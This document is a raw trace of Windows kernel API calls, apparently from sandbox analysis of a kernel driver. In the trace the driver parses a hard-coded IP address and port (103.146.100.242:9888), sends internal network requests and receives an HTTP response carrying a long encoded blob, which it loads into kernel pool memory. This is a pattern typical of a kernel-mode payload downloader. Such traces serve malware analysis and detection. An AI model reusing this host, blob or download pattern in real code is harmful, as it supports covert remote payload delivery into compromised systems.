| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0004c9e7d00, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0xffffd000292aa398, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd000292aa338, ret_val_unk_out = 0xffffe0003c719010 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c719010, Irp_unk_out = 0xffffe0003c719010, ret_val_out = 0x0 |
| KeSetEvent | Event_unk = 0xffffd000292aa398, Increment_unk = 0x0, Wait = 0, Event_unk_out = 0xffffd000292aa398, ret_val_out = 0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd000292aa350 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0004c9e7d00, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0xffffd000292aa350, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd000292aa338, ret_val_unk_out = 0xffffe0003b0d8700 |
| strstr | _Str = 103.146.100.242, _SubStr = ., ret_val_out = .146.100.242 |
| atoi | _Str = 103, ret_val_out = 103 |
| strstr | _Str = 146.100.242, _SubStr = ., ret_val_out = .100.242 |
| atoi | _Str = 146, ret_val_out = 146 |
| strstr | _Str = 100.242, _SubStr = ., ret_val_out = .242 |
| atoi | _Str = 100, ret_val_out = 100 |
| atoi | _Str = 242, ret_val_out = 242 |
| atoi | _Str = 9888, ret_val_out = 9888 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b0d8700, Irp_unk_out = 0xffffe0003b0d8700, ret_val_out = 0x103 |
| KeWaitForMutexObject | ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003c851f20, ret_val_ptr_out = 0x7fff |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd000292aa510 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa7, Tag = 0x54444953, ret_val_ptr_out = 0xffffe0003af7df50 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0004c9e7d00, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0xffffd000292aa510, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd000292aa500, ret_val_unk_out = 0xffffe0003c716010 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003af7df50, Length = 0xa7, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0xffffe0003c716010, Irp_unk_out = 0xffffe0003c716010, ret_val_unk_out = 0xffffe0003b098f40 |
| MmProbeAndLockPages | MemoryDescriptorList_unk = 0xffffe0003b098f40, AccessMode_unk = 0x0, Operation_unk = 0x2, MemoryDescriptorList_unk_out = 0xffffe0003b098f40 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c716010, Irp_unk_out = 0xffffe0003c716010, ret_val_out = 0x103 |
| KeWaitForMutexObject | ret_val_out = 0x0 |
| MmUnlockPages | MemoryDescriptorList_unk = 0xffffe0003b098f40, MemoryDescriptorList_unk_out = 0xffffe0003b098f40 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd000292aa508 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0004c9e7d00, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0xffffd000292aa508, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd000292aa4f8, ret_val_unk_out = 0xffffe0003c713010 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a7a5000, Length = 0xc800, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmProbeAndLockPages | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, Operation_unk = 0x2, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c713010, Irp_unk_out = 0xffffe0003c713010, ret_val_out = 0x103 |
| KeSetEvent | Event_unk = 0xffffd000292aa508, Increment_unk = 0x0, Wait = 0, Event_unk_out = 0xffffd000292aa508, ret_val_out = 0 |
| KeWaitForMutexObject | ret_val_out = 0x0 |
| MmUnlockPages | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| strstr | _Str = HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sun, 10 Apr 2022 07:54:15 GMT Content-Type: text/plain Content-Length: 2008 Last-Modified: Fri, 08 Apr 2022 07:37:12 GMT Connection: keep-alive ETag: "624fe628-7d8" Accept-Ranges: bytes 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, _SubStr = Content-Length: , ret_val_out = Content-Length: 2008 Last-Modified: Fri, 08 Apr 2022 07:37:12 GMT Connection: keep-alive ETag: "624fe628-7d8" Accept-Ranges: bytes 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 |
| strstr | _Str = Content-Length: 2008 Last-Modified: Fri, 08 Apr 2022 07:37:12 GMT Connection: keep-alive ETag: "624fe628-7d8" Accept-Ranges: bytes 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, _SubStr = , ret_val_out = Last-Modified: Fri, 08 Apr 2022 07:37:12 GMT Connection: keep-alive ETag: "624fe628-7d8" Accept-Ranges: bytes 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 |
| atoi | _Str = 2008, ret_val_out = 2008 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7dc, Tag = 0x48545450, ret_val_ptr_out = 0xffffe0003a779010 |
| strstr | _Str = HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sun, 10 Apr 2022 07:54:15 GMT Content-Type: text/plain Content-Length: 2008 Last-Modified: Fri, 08 Apr 2022 07:37:12 GMT Connection: keep-alive ETag: "624fe628-7d8" Accept-Ranges: bytes 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, _SubStr = , ret_val_out = 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 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7a5000, Tag = 0x48545450 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd000292aa4e0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0004c9e7d00, ret_val_out = 1 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4beb50, ret_val_out = 1 |
